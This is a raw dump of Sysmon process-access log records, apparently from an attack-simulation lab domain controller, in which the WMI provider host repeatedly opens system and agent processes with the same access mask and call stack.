15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022318Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022317Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022314Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 